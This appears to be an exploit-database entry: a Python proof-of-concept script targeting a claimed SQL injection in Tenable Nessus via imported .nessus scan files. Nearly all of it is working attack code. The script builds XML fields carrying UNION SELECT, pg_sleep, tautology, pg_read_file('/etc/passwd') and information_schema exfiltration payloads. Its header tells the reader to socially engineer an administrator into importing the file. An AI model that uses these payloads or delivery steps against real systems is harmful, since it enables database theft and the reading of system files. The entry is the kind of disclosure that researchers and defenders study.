# Exploit Title: Tenable Nessus 10.12.1 - SQL Injection # CVE: CVE-2026-57588 # Date: 2026-06-26 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Author Blog : https://banyamersecurity.com/blog/ # Vendor Homepage: https://www.tenable.com # Software Link: https://www.tenable.com/downloads/nessus # Affected: Nessus 10.12.0 and prior # Tested on: Nessus 10.12.0 # Category: Remote # Platform: Linux / Windows # Exploit Type: SQL Injection # CVSS: 4.3 (Medium) # Description: A SQL injection vulnerability exists in Tenable Nessus when importing malicious scan result files (.nessus XML). # Successful exploitation allows data exfiltration from the backend database by a privileged user. # Fixed in: Nessus 10.12.1 and later # Usage: # python3 exploit.py -o malicious.nessus # # Examples: # python3 exploit.py # python3 exploit.py --output poc.nessus # # Options: # -o, --output Output filename for the malicious .nessus file # # Notes: # • This is a Proof of Concept. Requires social engineering to trick a privileged user into importing the file. # • Works best against PostgreSQL backend (default in Nessus). # # How to Use # # Step 1: # Generate the malicious file using this script. # # Step 2: # Deliver the .nessus file to a Nessus administrator and have them import it via the web interface. def banner(): print(r""" ╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗ ║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║ ║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╔═╗ Banyamer Security ╔═╗ """) import argparse import xml.etree.ElementTree as ET def create_malicious_nessus(output_file): root = ET.Element("NessusClientData_v2") report = ET.SubElement(root, "Report") report.set("name", "PoC - CVE-2026-57588") host = ET.SubElement(report, "ReportHost") host.set("name", "poc-target.example.com") host_properties = ET.SubElement(host, "HostProperties") tags = [ ("hostname", "evil-host' UNION SELECT NULL, current_database(), version(), user() -- "), ("os", "Linux' AND (SELECT pg_sleep(5))=0 -- "), ("ip", "192.168.1.1' OR '1'='1"), ("fqdn", "test' ; SELECT pg_read_file('/etc/passwd') -- "), ] for name, value in tags: tag = ET.SubElement(host_properties, "tag") tag.set("name", name) tag.text = value item = ET.SubElement(host, "ReportItem") ET.SubElement(item, "pluginID").text = "999999" ET.SubElement(item, "pluginName").text = "CVE-2026-57588 PoC" ET.SubElement(item, "port").text = "0" ET.SubElement(item, "protocol").text = "tcp" ET.SubElement(item, "severity").text = "0" ET.SubElement(item, "description").text = "Proof of Concept for SQL Injection" plugin_output = ET.SubElement(item, "plugin_output") plugin_output.text = """Normal output ' UNION ALL SELECT '=== DATA EXFIL START ===', table_name, column_name, '=== DATA EXFIL END ===' FROM information_schema.columns WHERE table_schema = current_schema() -- """ tree = ET.ElementTree(root) with open(output_file, "wb") as f: tree.write(f, encoding="utf-8", xml_declaration=True) print(f"[+] Malicious file successfully created: {output_file}") print("[+] Deliver this file to a privileged Nessus user for import.") def main(): banner() parser = argparse.ArgumentParser(description="CVE-2026-57588 Nessus SQLi PoC") parser.add_argument("-o", "--output", default="cve-2026-57588-poc.nessus", help="Output filename (default: cve-2026-57588-poc.nessus)") args = parser.parse_args() create_malicious_nessus(args.output) if __name__ == "__main__": main()